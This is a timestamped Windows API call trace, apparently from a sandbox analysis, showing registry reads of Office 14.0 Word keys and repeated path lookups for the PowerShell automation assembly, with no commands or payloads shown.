[0086.627] RegQueryInfoKeyW (in: hKey=0x448, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.627] RegOpenKeyExW (in: hKey=0x448, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.627] RegCloseKey (hKey=0x448) returned 0x0
[0086.627] RegQueryInfoKeyW (in: hKey=0x44c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.627] RegOpenKeyExW (in: hKey=0x44c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x448) returned 0x0
[0086.627] RegCloseKey (hKey=0x44c) returned 0x0
[0086.627] RegQueryInfoKeyW (in: hKey=0x448, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.627] RegOpenKeyExW (in: hKey=0x448, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.627] RegCloseKey (hKey=0x448) returned 0x0
[0086.627] RegQueryInfoKeyW (in: hKey=0x44c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.627] RegOpenKeyExW (in: hKey=0x44c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x448) returned 0x0
[0086.627] RegCloseKey (hKey=0x44c) returned 0x0
[0086.628] RegQueryInfoKeyW (in: hKey=0x448, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0086.628] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x44c) returned 0x0
[0086.628] RegCloseKey (hKey=0x44c) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.628] RegCloseKey (hKey=0x44c) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.628] RegCloseKey (hKey=0x44c) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.628] RegCloseKey (hKey=0x44c) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.628] RegCloseKey (hKey=0x44c) returned 0x0
[0086.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.629] RegCloseKey (hKey=0x44c) returned 0x0
[0086.629] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.630] RegCloseKey (hKey=0x44c) returned 0x0
[0086.630] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x44c) returned 0x0
[0086.631] RegCloseKey (hKey=0x44c) returned 0x0
[0086.631] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x44c) returned 0x0
[0086.631] RegCloseKey (hKey=0x44c) returned 0x0
[0086.631] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x44c) returned 0x0
[0086.631] RegCloseKey (hKey=0x44c) returned 0x0
[0086.631] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x0) returned 0x2
[0086.631] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.631] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x44c) returned 0x0
[0086.631] RegQueryInfoKeyW (in: hKey=0x44c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.631] RegOpenKeyExW (in: hKey=0x44c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x450) returned 0x0
[0086.631] RegCloseKey (hKey=0x44c) returned 0x0
[0086.631] RegQueryInfoKeyW (in: hKey=0x450, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.632] RegOpenKeyExW (in: hKey=0x450, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x44c) returned 0x0
[0086.632] RegCloseKey (hKey=0x450) returned 0x0
[0086.632] RegQueryInfoKeyW (in: hKey=0x44c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.632] RegOpenKeyExW (in: hKey=0x44c, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x450) returned 0x0
[0086.632] RegCloseKey (hKey=0x44c) returned 0x0
[0086.632] RegQueryInfoKeyW (in: hKey=0x450, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.632] RegOpenKeyExW (in: hKey=0x450, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x44c) returned 0x0
[0086.632] RegCloseKey (hKey=0x450) returned 0x0
[0086.632] RegQueryInfoKeyW (in: hKey=0x44c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.632] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x0) returned 0x2
[0086.640] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc3c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.640] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x450) returned 0x0
[0086.640] RegQueryInfoKeyW (in: hKey=0x450, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc3c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.640] RegOpenKeyExW (in: hKey=0x450, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x454) returned 0x0
[0086.640] RegCloseKey (hKey=0x450) returned 0x0
[0086.640] RegQueryInfoKeyW (in: hKey=0x454, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc3c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818c50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818c50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.648] GetConsoleOutputCP () returned 0x1b5
[0086.648] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1a0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1a0) returned 0
[0086.648] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.649] GetConsoleOutputCP () returned 0x1b5
[0086.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.650] GetConsoleOutputCP () returned 0x1b5
